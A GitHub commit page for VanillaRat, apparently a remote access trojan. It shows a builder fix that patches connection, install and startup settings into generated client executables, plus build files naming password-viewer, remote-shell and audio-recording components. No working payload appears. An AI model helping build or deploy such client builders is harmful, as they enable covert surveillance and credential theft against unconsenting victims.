Skip to content
This repository has been archived by the owner on May 2, 2021. It is now read-only.

Commit

Permalink
Patch v1.6.1
Browse files Browse the repository at this point in the history
  • Loading branch information
dhuinda committed May 16, 2019
1 parent 82ef493 commit 0fd3203
Show file tree
Hide file tree
Showing 21 changed files with 53 additions and 45 deletions.
Binary file modified .vs/VanillaRat/v15/.suo
Binary file not shown.
Binary file modified .vs/VanillaRat/v15/Server/sqlite3/storage.ide
Binary file not shown.
Binary file modified .vs/VanillaRat/v15/Server/sqlite3/storage.ide-shm
Binary file not shown.
Binary file modified .vs/VanillaRat/v15/Server/sqlite3/storage.ide-wal
Binary file not shown.
2 changes: 2 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -68,6 +68,8 @@ Once a client is connected you can select the client and right click on the clie

**NinjahZ**

**NYAN-x-CAT (https://github.com/NYAN-x-CAT)**

## Important Disclaimer:

**I, the creator, am in no way responsible for any actions that you may make using this software. You take full responsibility with any action taken using this software. Please take note that this application was designed for educational purposes and should never be used maliciously. By downloading the software or source to the software, you automatically accept this agreement.**
2 changes: 1 addition & 1 deletion VanillaRat/Classes/Builder.cs
Original file line number Diff line number Diff line change
Expand Up @@ -34,7 +34,7 @@ public void BuildClient(string Port, string DNS, string Name, string ClientTag,
Constructor.Body.Instructions[4].Operand = ClientSettings.ClientTag;
Constructor.Body.Instructions[6].Operand = ClientSettings.UpdateInterval;
Constructor.Body.Instructions[8].Operand = ClientSettings.Install;
Constructor.Body.Instructions[12].Operand = ClientSettings.Startup;
Constructor.Body.Instructions[10].Operand = ClientSettings.Startup;
if (!Directory.Exists(Environment.CurrentDirectory + @"\Clients"))
Directory.CreateDirectory(Environment.CurrentDirectory + @"\Clients");
Assembly.Write(Environment.CurrentDirectory + @"\Clients\" + Name + ".exe");
Expand Down
24 changes: 12 additions & 12 deletions VanillaRat/Forms/Main.Designer.cs

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

6 changes: 4 additions & 2 deletions VanillaRat/Forms/RDC.Designer.cs

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

1 change: 1 addition & 0 deletions VanillaRat/Forms/RDC.cs
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
using System;
using System.Text;

using System.Windows.Forms;
using VanillaRat.Classes;

Expand Down
5 changes: 4 additions & 1 deletion VanillaRat/VanillaRat.csproj
Original file line number Diff line number Diff line change
Expand Up @@ -15,6 +15,7 @@
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
<IsWebBootstrapper>false</IsWebBootstrapper>
<PublishUrl>publish\</PublishUrl>
<Install>true</Install>
<InstallFrom>Disk</InstallFrom>
Expand All @@ -27,7 +28,6 @@
<MapFileExtensions>true</MapFileExtensions>
<ApplicationRevision>0</ApplicationRevision>
<ApplicationVersion>1.0.0.%2a</ApplicationVersion>
<IsWebBootstrapper>false</IsWebBootstrapper>
<UseApplicationTrust>false</UseApplicationTrust>
<BootstrapperEnabled>true</BootstrapperEnabled>
</PropertyGroup>
Expand Down Expand Up @@ -70,6 +70,9 @@
<CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
<Prefer32Bit>true</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<SignManifests>false</SignManifests>
</PropertyGroup>
<ItemGroup>
<Reference Include="Costura, Version=3.3.2.0, Culture=neutral, PublicKeyToken=9919ef960d84173d, processorArchitecture=MSIL">
<HintPath>..\packages\Costura.Fody.3.3.2\lib\net40\Costura.dll</HintPath>
Expand Down
Binary file modified VanillaRat/obj/Debug/VanillaRat.Properties.Resources.resources
Binary file not shown.
6 changes: 3 additions & 3 deletions VanillaRat/obj/Debug/VanillaRat.csproj.FileListAbsolute.txt
Original file line number Diff line number Diff line change
Expand Up @@ -117,7 +117,6 @@ C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\bin\Debug\VanillaRat.ex
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\bin\Debug\VanillaRat.exe
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\bin\Debug\VanillaRat.pdb
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\bin\Debug\dnlib.xml
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.csprojAssemblyReference.cache
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.exe.config
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.AudioRecorder.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.BuilderForm.resources
Expand All @@ -131,13 +130,14 @@ C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Fo
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Main.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.NotificationBox.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.OpenWebsite.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.PasswordViewer.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.RDC.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.RemoteShell.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.SettingsForm.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Properties.Resources.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.csproj.GenerateResource.cache
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.csproj.CoreCompileInputs.cache
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.csproj.CopyComplete
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.exe
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.pdb
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.PasswordViewer.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.Forms.RemoteShell.resources
C:\Users\dhuin\Desktop\Projects\C#\VanillaRat\VanillaRat\obj\Debug\VanillaRat.csprojAssemblyReference.cache
Binary file modified VanillaRat/obj/Debug/VanillaRat.csproj.GenerateResource.cache
Binary file not shown.
Binary file modified VanillaRat/obj/Debug/VanillaRat.csprojAssemblyReference.cache
Binary file not shown.
Binary file modified VanillaRat/obj/Debug/VanillaRat.exe
Binary file not shown.
Binary file modified VanillaRat/obj/Debug/VanillaRat.pdb
Binary file not shown.
Loading

0 comments on commit 0fd3203

Please sign in to comment.